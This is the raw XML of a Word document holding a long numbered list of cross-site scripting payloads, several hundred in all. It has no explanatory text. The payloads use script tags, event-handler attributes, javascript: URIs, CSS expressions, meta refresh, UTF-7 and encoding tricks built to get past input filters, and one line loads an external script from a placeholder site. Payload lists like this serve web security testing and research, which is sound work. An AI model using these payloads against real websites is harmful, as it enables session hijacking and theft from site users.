    <w:p w14:paraId="0BB7B2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content="&amp;NewLine; 1686 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1686)" http-equiv="refresh"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215606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&lt;form&gt;&lt;iframe &amp;#09;&amp;#16870;&amp;#16871687; src="javascript&amp;#58;alert(1687)"&amp;#16871687;&amp;#16870;&amp;#09;;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4549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http://www.google&lt;script .com&gt;alert(1688)&lt;/script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0934BD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^__^&gt;alert(1689))&lt;/script ^__^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475636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&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(1690)/**/&lt;/script &amp;#32; :-(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5162BD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&amp;#00;&lt;/form&gt;&lt;input type&amp;#61691;"date" onfocus="alert(1691)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FF2D2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&lt;a href="javascript:void(0)" onmouseover=&amp;NewLine;javascript:alert(1692)&amp;NewLine;&gt;X&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F73FC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~~~&gt;alert(1693)&lt;/script ~~~&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC56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&lt;iframe// src=javaSCRIPT&amp;colon;alert(1694)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3179D6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&lt;%&lt;!--'%&gt;&lt;script&gt;alert(1695);&lt;/script --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B6B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src="data:text/javascript,alert(1696)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC325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&lt;iframe/onreadystatechange=alert(1697)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6F7D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&lt;svg/onload=alert(1698)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731FB4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type="text" value=`` &lt;div/onmouseover='alert(1699)'&gt;X&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F976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src=`xx:xx`onerror=alert(1700)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0FC1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http-equiv="refresh" content="0;javascript&amp;colon;alert(1701)"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8AB3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&lt;script&gt;+-+-1702-+-+alert(1702)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D183A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&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#17030alert(1703)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6583D67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itworksinallbrowsers&gt;/*&lt;script* */alert(1704)&lt;/script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC703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 ?itworksonchrome?\/onerror = alert(1705)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6930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&lt;svg&gt;&lt;script onlypossibleinopera:-)&gt; alert(1706)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A3E7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x&gt; alert(1707) &lt;/script 1707=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FDEF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&lt;div/onmouseover='alert(1708)'&gt; style="x:"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E7BF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&lt;--`&lt;img/src=` onerror=alert(1709)&gt; --!&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B36FF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&lt;div style="position:absolute;top:0;left:0;width:171000%;height:171000%" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>onmouseover="prompt(1710)" onclick="alert(1710)"&gt;x&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAC9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&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1711)&gt;CLICKME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377594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&lt;script&gt;alert(1712);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB23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&lt;script&gt;alert(1713);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7026C7D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SRC="javascript:alert(1714);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACDC6E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SRC=javascript:alert(1715)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63540A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SRC=javascript:alert(1716)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2EF22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SRC=javascript:alert(1717)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C84E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"""&gt;&lt;SCRIPT&gt;alert(1718)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095472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&lt;scr&lt;script&gt;ipt&gt;alert(1719);&lt;/scr&lt;/script&gt;ipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF1E2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&lt;script&gt;alert(1720))&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6423592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src=foo.png onerror=alert(1721) /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B215CA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&lt;style&gt;@im\port'\ja\vasc\ript:alert(1722)';&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ED5B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 echo('&lt;scr)'; echo('ipt&gt;alert(1723)&lt;/script&gt;'); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E2B4D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&lt;marquee&gt;&lt;script&gt;alert(1724)&lt;/script&gt;&lt;/marquee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21418B4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SRC=\"jav&amp;#x09;ascript:alert(1725);\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8817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SRC=\"jav&amp;#x0A;ascript:alert(1726);\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BAF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SRC=\"jav&amp;#x0D;ascript:alert(1727);\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E17C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SRC=javascript:alert(1728))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF28F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"&gt;&lt;script&gt;alert(1729)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478839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&lt;/title&gt;&lt;script&gt;alert(1730)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501DA0F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&lt;/textarea&gt;&lt;script&gt;alert(1731)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB538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LOWSRC=\"javascript:alert(1732)\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125255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DYNSRC=\"javascript:alert(1733)\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA39E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&lt;font style='color:expression(alert(1734))'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF20FD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src="javascript:alert(1735)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375685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 language="JavaScript"&gt;alert(1736)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5988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onunload="javascript:alert(1737);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC48F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onLoad="alert(1738);"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4A6C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[color=red' onmouseover="alert(1739)"]mouse over[/color]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343E4EB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"/&gt;&lt;/a&gt;&lt;/&gt;&lt;img src=1740.gif onerror=alert(1740)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555DE3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window.alert(1741);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFDA5B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alert(1742));'))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CBDE5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&lt;iframe&lt;?php echo chr(11)?&gt; onload=alert(1743)&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661D56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 alert(1744))&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E80848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'"&gt;&gt;&lt;script&gt;alert(1745)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7369B42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HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(1746);\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3931B02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&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(1747);\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423EF2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&lt;script&gt;1748 1748 = 1; alert(1748)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5278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 type="text/css"&gt;BODY{background:url("javascript:alert(1749)")}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092AAAB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&lt;?='&lt;SCRIPT&gt;alert(1750)&lt;/SCRIPT&gt;'?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E49A5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 onfocus=alert(1751) "&gt; &lt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110267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&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript:alert(1752);\"&gt;&lt;/FRAMESET&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2445CC2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&lt;STYLE&gt;li {list-style-image: url(\"javascript:alert(1753)\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B6106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perl -e 'print \"&lt;SCR\0IPT&gt;alert(1754)&lt;/SCR\0IPT&gt;\";' &gt; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779FC1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'print \"&lt;IMG SRC=java\0script:alert(1755)&gt;\";' &gt; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB419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&lt;br size=\"&amp;{alert(1756)}\"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646F655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&lt;scrscriptipt&gt;alert(1757)&lt;/scrscriptipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20908D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&lt;/script&gt;&lt;script&gt;alert(1759)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64831D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"&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(1760)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151D1F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[color=red width=expression(alert(1761))][color]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E02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&lt;BASE HREF="javascript:alert(1762);//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CE977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"&gt;&lt;/iframe&gt;&lt;script&gt;alert(1763)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7095890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onLoad="while(true) alert(1764);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B668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'"&gt;&lt;/title&gt;&lt;script&gt;alert(1765)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C174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&lt;/textarea&gt;'"&gt;&lt;script&gt;alert(1766)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A09B1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'""&gt;&lt;script language="JavaScript"&gt; alert(1767);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B7E6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&lt;/script&gt;&lt;/script&gt;&lt;&lt;&lt;&lt;script&gt;&lt;&gt;&gt;&gt;&gt;&lt;&lt;&lt;script&gt;alert(1768)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDC16B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SRC="javascript:alert(1769);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F60759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'&gt;&lt;/select&gt;&lt;script&gt;alert(1770)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128D3A5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a="get";b="URL";c="javascript:";d="alert(1771);";eval(a+b+c+d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F04E7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='&gt;&lt;script&gt;alert(1772)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2AC6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background=javascript:'"&gt;&lt;script&gt;alert(1773)&lt;/script&gt;&gt;&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2612A47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"&gt;/XaDoS/&gt;&lt;script&gt;alert(1774)&lt;/script&gt;&lt;script src="http://www.site.com/XSS.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B65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"&gt;/KinG-InFeT.NeT/&gt;&lt;script&gt;alert(1775)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AC39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!--" /&gt;&lt;script&gt;alert(1776);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B358D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&lt;script&gt;alert(1777)&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708392F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"&gt;&lt;script&gt;alert(1778)&lt;/script&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A9F18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'"&gt;&lt;/title&gt;&lt;script&gt;alert(1779)&lt;/script&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA3EC8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"""&gt;&lt;script&gt;alert(1780)&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B52BF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&lt;script&gt;alert(1781)&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C64936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"&gt;&lt;script&gt;alert(1782)&lt;/script&gt;"&gt;&lt;script&gt;alert("XSS by \nxss&lt;/h1&gt;&lt;/marquee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978774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'"&gt;&lt;/title&gt;&lt;script&gt;alert(1783)&lt;/script&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D844E2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&lt;iframe src="javascript:alert(1784);"&gt;&lt;/iframe&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B7484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'&gt;&lt;SCRIPT&gt;alert(1785))&lt;/SCRIPT&gt;&lt;img src="" alt='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5D57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"&gt;&lt;SCRIPT&gt;alert(1786))&lt;/SCRIPT&gt;&lt;img src="" alt="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F316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\'&gt;&lt;SCRIPT&gt;alert(1787))&lt;/SCRIPT&gt;&lt;img src="" alt=\'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B32B8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'); alert(1788); var x='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98C9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\\'); alert(1789);var x=\'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C68EBF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//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(1790));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3030B7F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&gt;"&gt;&lt;ScRiPt%20%0a%0d&gt;alert(1791)%3B&lt;/ScRiPt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580DA39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 alert(1792); &lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4AC30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ONLOAD=alert(1793)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528F3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BACKGROUND="javascript:alert(1794)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F146CC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SRC="javascript:alert(1795);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9DA7C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DYNSRC="javascript:alert(1796)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343A01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LOWSRC="javascript:alert(1797)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304999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&lt;INPUT TYPE="IMAGE" SRC="javascript:alert(1798);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1292361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&lt;LINK REL="stylesheet" HREF="javascript:alert(1799);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E31D67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&lt;TABLE BACKGROUND="javascript:alert(1800)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FE53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&lt;TD BACKGROUND="javascript:alert(1801)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE38EE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STYLE="background-image: url(javascript:alert(1802))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ED79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&lt;DIV STYLE="width: expression(alert(1803));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C515D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&amp;apos;;alert(1804))//\&amp;apos;;alert(1804))//&amp;quot;;alert(1804))//\&amp;quot;;alert(1804))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&amp;apos;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(1804))&amp;lt;/SCRIPT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287BC0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&amp;lt;SCRIPT&amp;gt;alert(1805)&amp;lt;/SCRIPT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA41E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&amp;lt;SCRIPT&amp;gt;alert(1806))&amp;lt;/SCRIPT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69332A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&amp;lt;BASE HREF=&amp;quot;javascript:alert(1807);//&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFB290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&amp;lt;BGSOUND SRC=&amp;quot;javascript:alert(1808);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40624E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BACKGROUND=&amp;quot;javascript:alert(1809);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16595E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ONLOAD=alert(1810)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D96D8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STYLE=&amp;quot;background-image: url(javascript:alert(1811))&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9900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STYLE=&amp;quot;background-image: url(&amp;amp;#1;javascript:alert(1812))&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01474B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&amp;lt;DIV STYLE=&amp;quot;width: expression(alert(1813));&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2728BAC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&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;javascript:alert(1814);&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60933E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&amp;lt;IFRAME SRC=&amp;quot;javascript:alert(1815);&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE4403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&amp;lt;INPUT TYPE=&amp;quot;IMAGE&amp;quot; SRC=&amp;quot;javascript:alert(1816);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7F9CD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SRC=&amp;quot;javascript:alert(1817);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B207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SRC=javascript:alert(1818)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DB858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DYNSRC=&amp;quot;javascript:alert(1819);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F58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LOWSRC=&amp;quot;javascript:alert(1820);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541E7D7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&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;javascript:alert(1821)&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C166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%BCscript%BEalert(1822)%BC/script%BE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06937A6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HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=javascript:alert(1823);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CADC7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HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0; URL=http://;URL=javascript:alert(1824);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B798DE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&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert(1825)&amp;gt;&amp;lt;/OBJECT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2146101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a=&amp;quot;get&amp;quot;;&amp;amp;#10;b=&amp;quot;URL(&amp;quot;&amp;quot;;&amp;amp;#10;c=&amp;quot;javascript:&amp;quot;;&amp;amp;#10;d=&amp;quot;alert(1826);&amp;quot;)&amp;quot;;&amp;#10;eval(a+b+c+d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E32FA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 TYPE=&amp;quot;text/javascript&amp;quot;&amp;gt;alert(1827);&amp;lt;/STYLE&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7B4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STYLE=&amp;quot;xss:expr/*XSS*/ession(alert(1828))&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B5C15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&amp;lt;XSS STYLE=&amp;quot;xss:expression(alert(1829))&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC5C87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&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;javascript:alert(1830)&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA78D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 type=&amp;quot;text/css&amp;quot;&amp;gt;BODY{background:url(&amp;quot;javascript:alert(1831)&amp;quot;)}&amp;lt;/STYLE&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DCEBD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&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;javascript:alert(1832);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E50AFB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&amp;lt;TABLE BACKGROUND=&amp;quot;javascript:alert(1833)&amp;quot;&amp;gt;&amp;lt;/TABLE&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1872993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&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;javascript:alert(1834)&amp;quot;&amp;gt;&amp;lt;/TD&amp;gt;&amp;lt;/TABLE&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6C854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&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert(1835);&amp;quot;&amp;gt;]]&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01410A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&amp;lt;XML ID=&amp;quot;xss&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert(1836)&amp;quot;&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3732E1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&amp;lt;META HTTP-EQUIV=&amp;quot;Set-Cookie&amp;quot; Content=&amp;quot;USERID=&amp;lt;SCRIPT&amp;gt;alert(1837)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360700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&amp;lt;BR SIZE=&amp;quot;&amp;amp;{alert(1838)}&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A690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SRC=JaVaScRiPt:alert(1839)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2204997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SRC=javascript:alert(1840)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F2F3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SRC=`javascript:alert(1841)`&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42F6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SRC=javascript:alert(1842))&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E6E70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&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert(1843);+ADw-/SCRIPT+AD4-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3902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\&amp;quot;;alert(1844);//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A930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&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(1845);&amp;lt;/SCRIPT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21575E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&amp;lt;STYLE&amp;gt;@im\port&amp;apos;\ja\vasc\ript:alert(1846)&amp;apos;;&amp;lt;/STYLE&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC73D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SRC=&amp;quot;jav&amp;#x09;ascript:alert(1847);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0982BA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SRC=&amp;quot;jav&amp;amp;#x09;ascript:alert(1848);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772ECC2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SRC=&amp;quot;jav&amp;amp;#x0A;ascript:alert(1849);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A33B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SRC=&amp;quot;jav&amp;amp;#x0D;ascript:alert(1850);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F5E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&amp;apos;print &amp;quot;&amp;lt;IMG SRC=java\0script:alert(1851)&gt;&amp;quot;;&amp;apos;&amp;gt; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5560199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&amp;apos;print &amp;quot;&amp;amp;&amp;lt;SCR\0IPT&amp;gt;alert(1852)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;;&amp;apos; &amp;gt; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C1C0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 &amp;amp;#14;  javascript:alert(1853);&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFAD7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&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(1854)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B22D8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SRC=&amp;quot;javascript:alert(1855)&amp;quot;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CFE8D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&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(1856);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D238F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&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(1857)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384A47C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&amp;quot;&amp;gt;&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(1858)&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B0051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&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1859)&amp;lt;/script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC029D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&amp;lt;scrscriptipt&amp;gt;alert(1861)&amp;lt;/scrscriptipt&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A12A2F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&amp;lt;br size=\&amp;quot;&amp;amp;{alert(1862)}\&amp;quot;&amp;gt;</w:t>
      </w:r>
    </w:p>
